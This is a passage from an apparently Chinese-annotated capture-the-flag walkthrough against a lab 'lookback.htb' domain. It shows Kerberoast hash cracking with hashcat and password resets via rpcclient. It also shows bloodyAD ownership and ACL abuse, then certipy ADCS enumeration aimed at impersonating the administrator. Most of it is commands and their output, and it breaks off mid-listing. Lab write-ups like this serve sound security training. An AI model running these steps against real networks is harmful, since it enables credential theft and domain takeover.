F0E8786217293D9C40385D17104698C866FE7F69EC076E99E60612704FFC5B9B076B09D46C92F3DA9F8A37C1CB3E6EB9CC6B1FC9E7D4B7C3BD56996FED0E8424E78A8D749EE56D44EFD0BB893B9203D107F5FD8427BF71218D713BD4F4FC11102131CD79A3A1CC94150B7F36C6F224F360C8A81DC072FB094B43B6237C84D78549A85E91DFB39DFB4CB9938EC62BECBC16D5A8885E8857703AF25054737DB87738E6A78A384A4F18640D52F3250489FD0F6EBFCD39DCBA85ED1CA86FB97254C05EBDA575F790F6502A2C07CC52BDC49B1C5118513D06B453460BEA7606A32F1BD602C714451E837DC6B829A8FD586072634B84158FA136B0B0E75CBD040BB686D56BECEEA9F25C19FB2B5DAB9F514D91805CCE95A191E6B6601D7FC91FB6D56D386B53890E0A1FE2C592ED4D0A755B19196F944C551F3B08D08635F5256B7B442D18D21D26EB7E0314104750F51CCBBF5BA235879D3BD6A5990C540E91FD65011892804709D7F8FF7071F40E6D9E11A9649499CAE1EA753FFA28FC87038BBEE09DF813EAA24D7BEFD258FF383620C8A693A6666F1091E01FBCB534C74782D5AAECAEC5A6090B4921527ECAA99FFEB316F0956B33A10D489CB09385391B1430CAB31A63952C5CFA7B86920F6B' > itsec.hash

┌──(web)─(root㉿kali)-[/home/kali]
└─# hashcat -m 13100 itsec.hash /usr/share/wordlists/rockyou.txt --force
hashcat (v7.1.2) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

Host memory allocated for this attack: 513 MB (2151 MB free)

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-admin@lookback.htb*$15b2938bbb018ec0b10522526a1e3ca6$aef2d06442e183bd6d32b3705b7556ea18abdd06ddeeb448e9a49e4e1ae21ca823bfc1e57a26b02fce1b6c107cbefbe96bf5e6175dff88a55b1c9075a0acaf058589ff0b07805ff68849d65796dc9fb7b3a9ccee249068950bf5f838685aa2449d5e8e4a88a75c0a7521177108ada00b65a6f6aaca6e59972d4f9f3582a5c606d5dda154e232e0563971c97f37071995147bde8bbbf29d295fb8549f13961c7a781ad02c8d20d9996954336f82d5da0c4e42097191d8d71a6617c7ed4933b2e0ff7f3006b97fd2e3399577a61b11a2398026511604db6b818c494abefc5c734b79d8bbbe7ec917137d3060a423e3714533efabd76401977cb66d19c2dd435b4218b4de2df76925c4edd2d94e6ff886abcccac5234ecff7d51d622dcda5ca2edece98aa7d8da59fd7f8296e5b619a9bf9d4183cfc5708280fb8ccf21b8a9f4b0d552bb6a3c78a0859060a35c34e17c21ad37dd10d2898d78edef8e8d48423b79bd915012e77f8a74ec2c61d75cd44bb7f903b47343730f34beaee6cac2758be44a13b026a48571bba8c0ab4a7087466c8f611c08608d2294eebc57c9b0c5661470aeea820e1616d551f96baa6d32e9a5631b5c9c5fce8c0a38c47d2c072dfb0f6a3a418f0675b7f66f6221ec2a53c92179fab9d3e49b096aec18461e0cbb92730034e4c835b192d3bd3855c4683eae38f990a2c5c1834f158bde4af684d6e66d8c9ec1acd9cfdb4130053d3dec7473554b7568f94663104c67161e1b1a7bbc5221d5a44d8f63e612477eb8d610dd53773bac09de0f47f46588ae2be7c052a6070ff74743de1b3b9cab7ff6550771d358e6586e6e5f098a7e2ed38cf17dd13af77224be4d195e0d084043386854c64837ac941d837bd884692acc2f55e2723957944913c88628193ae567d34ba79a8142329b39ff0e8786217293d9c40385d17104698c866fe7f69ec076e99e60612704ffc5b9b076b09d46c92f3da9f8a37c1cb3e6eb9cc6b1fc9e7d4b7c3bd56996fed0e8424e78a8d749ee56d44efd0bb893b9203d107f5fd8427bf71218d713bd4f4fc11102131cd79a3a1cc94150b7f36c6f224f360c8a81dc072fb094b43b6237c84d78549a85e91dfb39dfb4cb9938ec62becbc16d5a8885e8857703af25054737db87738e6a78a384a4f18640d52f3250489fd0f6ebfcd39dcba85ed1ca86fb97254c05ebda575f790f6502a2c07cc52bdc49b1c5118513d06b453460bea7606a32f1bd602c714451e837dc6b829a8fd586072634b84158fa136b0b0e75cbd040bb686d56beceea9f25c19fb2b5dab9f514d91805cce95a191e6b6601d7fc91fb6d56d386b53890e0a1fe2c592ed4d0a755b19196f944c551f3b08d08635f5256b7b442d18d21d26eb7e0314104750f51ccbbf5ba235879d3bd6a5990c540e91fd65011892804709d7f8ff7071f40e6d9e11a9649499cae1ea753ffa28fc87038bbee09df813eaa24d7befd258ff383620c8a693a6666f1091e01fbcb534c74782d5aaecaec5a6090b4921527ecaa99ffeb316f0956b33a10d489cb09385391b1430cab31a63952c5cfa7b86920f6b:butterfly
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*IT-SEC-admin$lookback.htb$http/itsec-a...920f6b
Time.Started.....: Sat Apr 11 13:17:13 2026, (0 secs)
Time.Estimated...: Sat Apr 11 13:17:13 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:   698.1 kH/s (2.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/14344385 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> oooooo
Hardware.Mon.#01.: Util: 28%

IT-SEC-admin -> IT-admin（改密）

rpcclinet

┌──(web)─(root㉿kali)-[/home/kali]
└─# rpcclient -U 'lookback.htb/IT-SEC-admin%butterfly' 172.16.55.128 -c "setuserinfo2 IT-admin 23 'V9bT6itAdmin2026'"

netexec

┌──(web)─(root㉿kali)-[/home/kali]
└─# nxc smb 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' 

SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-admin:V9bT6itAdmin2026

IT-admin -> IT-login-user（接管对象）

步骤 1：将 `IT-login-user` 的所有者设置为 `IT-admin`

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set owner IT-login-user IT-admin
[+] Old owner S-1-5-21-3830242231-3868280746-2763890440-512 is now replaced by IT-admin on IT-login-user

作用：使 IT-admin 成为 IT-login-user 对象的所有者。
权限要求：IT-admin 需要对目标对象有 WriteOwner 权限（或更高）。
攻击意义：所有者自动获得对对象的 WriteDacl 权限，为下一步授予 GenericAll 铺路。

步骤 2：授予 `IT-admin` 对 `IT-login-user` 的完全控制权 (`GenericAll`)

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' add genericAll IT-login-user IT-admin
[+] IT-admin has now GenericAll on IT-login-user

作用：赋予 IT-admin 对 IT-login-user 对象的完全控制（包括重置密码、修改属性等）。
前置条件：步骤 1 成功后，IT-admin 作为所有者可以修改 DACL，因此此命令应能执行成功。

步骤 3：强制重置 `IT-login-user` 的密码

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q bloodyAD --host 172.16.55.128 -d lookback.htb -u IT-admin -p 'V9bT6itAdmin2026' set password IT-login-user 'ITLogin!2026#Qw'
[+] Password changed successfully!

作用：将 IT-login-user 的密码改为 ITLogin!2026#Qw。
权限要求：需要 GenericAll 或 User-Force-Change-Password 扩展权限。步骤 2 已授予完全控制，故可成功。

步骤 4：验证新凭据是否有效（SMB 登录）

┌──(web)─(root㉿kali)-[/home/kali]
└─# nxc smb 172.16.55.128 -d lookback.htb -u IT-login-user -p 'ITLogin!2026#Qw'
SMB         172.16.55.128   445    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:lookback.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         172.16.55.128   445    DC01             [+] lookback.htb\IT-login-user:ITLogin!2026#Qw

certipy

根据 certipy find 的输出，我们发现了一个高价值漏洞模板：**SubCA**（模板索引 17）。该模板满足 ESC1、ESC2、ESC3 和 ESC15 的条件，且已启用。最关键的是，它允许 Enrollee Supplies Subject（请求者指定主题别名），并且支持 Client Authentication 扩展密钥用途。这意味着我们可以通过指定 UPN 为 administrator@lookback.htb 来申请一张代表域管理员的证书，进而通过 Kerberos PKINIT 获取高权限票据

┌──(web)─(root㉿kali)-[/home/kali]
└─# proxychains -q certipy find -u 'Administrator @lookback.htb' -p 'ITLogin!2026#Qw' -dc-ip 172.16.55.128 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.; Server Do53:172.16.55.128@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'lookback-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lookback-DC01-CA'
[*] Checking web enrollment for CA 'lookback-DC01-CA' @ 'dc01.lookback.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : lookback-DC01-CA
    DNS Name                            : dc01.lookback.htb
    Certificate Subject                 : CN=lookback-DC01-CA, DC=lookback, DC=htb
    Certificate Serial Number           : 4D974861E25474B44FA1690AA7067B52
    Certificate Validity Start          : 2025-10-19 13:42:34+00:00
    Certificate Validity End            : 2030-10-19 13:52:33+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : LOOKBACK.HTB\Administrators
      Access Rights
        ManageCa                        : LOOKBACK.HTB\Administrators
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        ManageCertificates              : LOOKBACK.HTB\Administrators
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Enroll                          : LOOKBACK.HTB\Authenticated Users
    [+] User Enrollable Principals      : LOOKBACK.HTB\Authenticated Users
    [+] User ACL Principals             : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Administrators
                                          LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates
  0
    Template Name                       : IT-login
    Display Name                        : IT-login
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectRequireCommonName
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          KDC Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T14:00:38+00:00
    Template Last Modified              : 2025-10-19T14:00:39+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\IT
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Administrator
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Administrator
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  1
    Template Name                       : login
    Display Name                        : login
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectRequireCommonName
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Smart Card Logon
                                          KDC Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:58:21+00:00
    Template Last Modified              : 2025-10-19T13:59:46+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\IT
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Administrator
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Administrator
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  2
    Template Name                       : KerberosAuthentication
    Display Name                        : Kerberos Authentication
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDomainDns
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Domain Controllers
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  3
    Template Name                       : OCSPResponseSigning
    Display Name                        : OCSP Response Signing
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireDnsAsCn
    Enrollment Flag                     : AddOcspNocheck
                                          Norevocationinfoinissuedcerts
    Extended Key Usage                  : OCSP Signing
    Requires Manager Approval           : False
    Requires Key Archival               : False
    RA Application Policies             : msPKI-Asymmetric-Algorithm`PZPWSTR`RSA`msPKI-Hash-Algorithm`PZPWSTR`SHA1`msPKI-Key-Security-Descriptor`PZPWSTR`D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;GR;;;S-1-5-80-3804348527-3718992918-2141599610-3686422417-2726379419)`msPKI-Key-Usage`DWORD`2`
    Authorized Signatures Required      : 0
    Schema Version                      : 3
    Validity Period                     : 2 weeks
    Renewal Period                      : 2 days
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  4
    Template Name                       : RASAndIASServer
    Display Name                        : RAS and IAS Server
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
                                          SubjectRequireCommonName
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\RAS and IAS Servers
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\RAS and IAS Servers
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  5
    Template Name                       : Workstation
    Display Name                        : Workstation Authentication
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Computers
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  6
    Template Name                       : DirectoryEmailReplication
    Display Name                        : Directory Email Replication
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDirectoryGuid
                                          SubjectAltRequireDns
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Extended Key Usage                  : Directory Service Email Replication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Domain Controllers
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  7
    Template Name                       : DomainControllerAuthentication
    Display Name                        : Domain Controller Authentication
    Certificate Authorities             : lookback-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
                                          Smart Card Logon
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Enterprise Read-only Domain Controllers
                                          LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Admins
                                          LOOKBACK.HTB\Enterprise Domain Controllers
        Write Property AutoEnroll       : LOOKBACK.HTB\Domain Controllers
                                          LOOKBACK.HTB\Enterprise Domain Controllers
    [+] User Enrollable Principals      : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  8
    Template Name                       : KeyRecoveryAgent
    Display Name                        : Key Recovery Agent
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PendAllRequests
                                          PublishToKraContainer
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Key Recovery Agent
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  9
    Template Name                       : CAExchange
    Display Name                        : CA Exchange
    Enabled                             : False
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
    Extended Key Usage                  : Private Key Archival
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 week
    Renewal Period                      : 1 day
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
        Full Control Principals         : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Owner Principals          : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Dacl Principals           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
        Write Property Enroll           : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
    [+] User ACL Principals             : LOOKBACK.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : Template is owned by user.
  10
    Template Name                       : CrossCA
    Display Name                        : Cross Certification Authority
    Enabled                             : False
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
    Private Key Flag                    : ExportableKey
    Requires Manager Approval           : False
    Requires Key Archival               : False
    RA Application Policies             : Qualified Subordination
    Authorized Signatures Required      : 1
    Schema Version                      : 2
    Validity Period                     : 5 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-10-19T13:52:34+00:00
    Template Last Modified              : 2025-10-19T13:52:34+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : LOOKBACK.HTB\Domain Admins
                                          LOOKBACK.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : LOOKBACK.HTB\Enterprise Admins
